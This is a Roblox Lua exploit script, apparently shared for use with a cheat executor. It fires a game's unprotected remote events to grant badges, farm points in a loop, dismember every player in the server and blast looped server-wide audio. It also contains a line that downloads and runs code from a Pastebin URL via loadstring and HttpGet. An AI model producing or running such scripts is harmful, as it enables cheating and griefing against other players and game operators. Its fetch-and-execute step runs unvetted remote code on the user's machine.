--hi im lazy to make gui so yeah sorry about this
---------------------------------------------------------------------------------------------------------------------------------------
--Give badges
game.ReplicatedStorage.GiveBadge:FireServer(2124511377, "Airborne"); --1st number is badge id 2nd is badge name

---------------------------------------------------------------------------------------------------------------------------------------
--give free points
for i = 1,200 do --change 200 to how many times do you want
    -- This script was generated by Hydroxide's RemoteSpy: https://github.com/Upbolt/Hydroxide

local ohInstance1 = game.Players.LocalPlayer.Character.Torso
local ohString2 = "29312939129391931HCDIHCNDSjincjisnedcisd"

game:GetService("ReplicatedStorage").Impact:FireServer(ohInstance1, ohString2)
end
---------------------------------------------------------------------------------------------------------------------------------------
--Turn everyone into a piece
-- This script was generated by Hydroxide's RemoteSpy: https://github.com/Upbolt/Hydroxide
for i,v in pairs(game.Players:GetPlayers()) do
    local ohInstance1 = v.Character.Torso --[[ PARENTED TO NIL OR DESTROYED ]]
    
    game:GetService("ReplicatedStorage").Limb:FireServer(ohInstance1)
    
    -- This script was generated by Hydroxide's RemoteSpy: https://github.com/Upbolt/Hydroxide
    
    local ohInstance1 = v.Character.Head --[[ PARENTED TO NIL OR DESTROYED ]]
    
    game:GetService("ReplicatedStorage").Limb:FireServer(ohInstance1)
    
    -- This script was generated by Hydroxide's RemoteSpy: https://github.com/Upbolt/Hydroxide
    
    local ohInstance1 = v.Character["Left Leg"] --[[ PARENTED TO NIL OR DESTROYED ]]
    
    game:GetService("ReplicatedStorage").Limb:FireServer(ohInstance1)
    
    local ohInstance1 = v.Character["Right Leg"] --[[ PARENTED TO NIL OR DESTROYED ]]
    
    game:GetService("ReplicatedStorage").Limb:FireServer(ohInstance1)
    
    local ohInstance1 = v.Character["Left Arm"] --[[ PARENTED TO NIL OR DESTROYED ]]
    
    game:GetService("ReplicatedStorage").Limb:FireServer(ohInstance1)
    
    local ohInstance1 = v.Character["Right Arm"] --[[ PARENTED TO NIL OR DESTROYED ]]
    
    game:GetService("ReplicatedStorage").Limb:FireServer(ohInstance1)
    end
---------------------------------------------------------------------------------------------------------------------------------------
--FE sound player you can repeat the music how many times do you want lol
local ohNumber1 = 50000 --Maxdistance
local ohBoolean2 = true --looped
local ohNumber3 = 10 --emitter thing idk
local ohNumber4 = 5 --volume
local ohString5 = "rbxassetid://3827689683" --sound id
local ohNumber6 = 0 --animation

game:GetService("ReplicatedStorage").EmoteSound:FireServer(ohNumber1, ohBoolean2, ohNumber3, ohNumber4, ohString5, ohNumber6)
---------------------------------------------------------------------------------------------------------------------------------------
--stop the music
game:GetService("ReplicatedStorage").EmoteSoundStop:FireServer()
---------------------------------------------------------------------------------------------------------------------------------------
--Harked gui
loadstring(game:HttpGet("https://pastebin.com/LY346axB"))();
---------------------------------------------------------------------------------------------------------------------------------------

--if anything doesnt work please tell me so I can fix it thx